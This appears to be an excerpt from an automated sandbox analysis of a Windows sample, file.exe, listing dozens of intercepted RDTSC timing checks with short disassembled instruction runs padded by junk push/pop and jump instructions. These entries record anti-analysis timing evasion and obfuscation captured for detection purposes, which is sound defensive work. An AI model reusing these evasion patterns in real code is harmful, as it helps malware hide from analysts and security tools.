                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1287A67 second address: 1287AA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007EFEB91CA553h 0x0000000e pop ebx 0x0000000f jng 00007EFEB91CA558h 0x00000015 popad 0x00000016 push ebx 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128A9B2 second address: 128A9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290C28 second address: 1290C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290C2C second address: 1290C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290C30 second address: 1290C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290C3A second address: 1290C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129122E second address: 1291234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291234 second address: 1291253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFEB92DE1F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291253 second address: 129126F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFEB91CA556h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291801 second address: 1291807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291807 second address: 129180B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291ADB second address: 1291AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jg 00007EFEB92DE1E6h 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292687 second address: 129268B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129299C second address: 12929E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F1h 0x00000007 pushad 0x00000008 jmp 00007EFEB92DE1F5h 0x0000000d jp 00007EFEB92DE1E6h 0x00000013 jmp 00007EFEB92DE1EAh 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007EFEB92DE1EAh 0x00000025 push esi 0x00000026 pop esi 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296BEA second address: 1296C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFEB91CA546h 0x0000000a popad 0x0000000b jc 00007EFEB91CA54Ch 0x00000011 jns 00007EFEB91CA546h 0x00000017 popad 0x00000018 pushad 0x00000019 push edi 0x0000001a jnp 00007EFEB91CA546h 0x00000020 pop edi 0x00000021 push edx 0x00000022 jno 00007EFEB91CA546h 0x00000028 pop edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296C16 second address: 1296C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296D78 second address: 1296D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129716D second address: 1297173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12972D8 second address: 12972DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129743F second address: 1297449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFEB92DE1E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A54F1 second address: 12A54F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A54F5 second address: 12A5501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5501 second address: 12A5505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3787 second address: 12A378B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3BD4 second address: 12A3BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA54Dh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3BE7 second address: 12A3BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3D42 second address: 12A3D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB91CA559h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3D61 second address: 12A3D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1ECh 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007EFEB92DE1E6h 0x00000017 jmp 00007EFEB92DE1F1h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A400E second address: 12A4049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA558h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007EFEB91CA559h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4049 second address: 12A404D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4178 second address: 12A4185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007EFEB91CA546h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A459B second address: 12A45A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007EFEB92DE1E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A45A5 second address: 12A45D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jo 00007EFEB91CA546h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 jp 00007EFEB91CA55Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEF3E second address: 12AEF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEF44 second address: 12AEF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEF48 second address: 12AEF76 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007EFEB92DE1E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007EFEB92DE1FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEF76 second address: 12AEFAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007EFEB91CA558h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEFAF second address: 12AEFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C10BF second address: 12C10C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C0C8A second address: 12C0C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C5D65 second address: 12C5D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC3C6 second address: 12CC3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC3CC second address: 12CC3D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFEB91CA546h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D562F second address: 12D5642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007EFEB92DE1E6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5642 second address: 12D564A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D564A second address: 12D564F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D564F second address: 12D565D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D565D second address: 12D5663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5663 second address: 12D5667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5667 second address: 12D567B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9E2D second address: 12D9E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9E31 second address: 12D9E50 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007EFEB92DE1F1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9E50 second address: 12D9E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9E67 second address: 12D9E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007EFEB92DE1E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9FAB second address: 12D9FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9FB1 second address: 12D9FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA101 second address: 12DA10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA278 second address: 12DA291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB92DE1F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA291 second address: 12DA295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA569 second address: 12DA584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F6h 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA584 second address: 12DA59A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007EFEB91CA54Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA59A second address: 12DA59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA723 second address: 12DA729 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA729 second address: 12DA745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jng 00007EFEB92DE1E6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jng 00007EFEB92DE1E6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA745 second address: 12DA75D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007EFEB91CA548h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007EFEB91CA546h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA75D second address: 12DA761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA761 second address: 12DA76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DEDD1 second address: 12DEDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DEDD9 second address: 12DEDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DEDE4 second address: 12DEDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DEDE8 second address: 12DEDEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DEDEC second address: 12DEDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007EFEB92DE1E8h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DEDFE second address: 12DEE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFEB91CA546h 0x0000000a jne 00007EFEB91CA546h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD0A second address: 12EAD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE957 second address: 12EE95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE95B second address: 12EE965 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE965 second address: 12EE98E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007EFEB91CA552h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE98E second address: 12EE993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE993 second address: 12EE999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F0307 second address: 12F030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F030C second address: 12F0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7E89 second address: 12E7E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7E8D second address: 12E7E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE537 second address: 12FE53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE53F second address: 12FE544 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE253 second address: 12FE266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13009D3 second address: 13009E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFEB91CA546h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13009E1 second address: 13009F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFEB92DE1E6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007EFEB92DE1E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13009F4 second address: 13009F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13009F8 second address: 1300A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300A04 second address: 1300A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EC06 second address: 130EC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EC0A second address: 130EC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EC18 second address: 130EC2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jno 00007EFEB92DE1E6h 0x0000000d jnl 00007EFEB92DE1E6h 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130ED9A second address: 130EDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EDA0 second address: 130EDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EDA4 second address: 130EDA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EDA8 second address: 130EDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EDB2 second address: 130EDB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EDB8 second address: 130EDC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007EFEB92DE1E6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EDC6 second address: 130EDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EDCA second address: 130EDCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
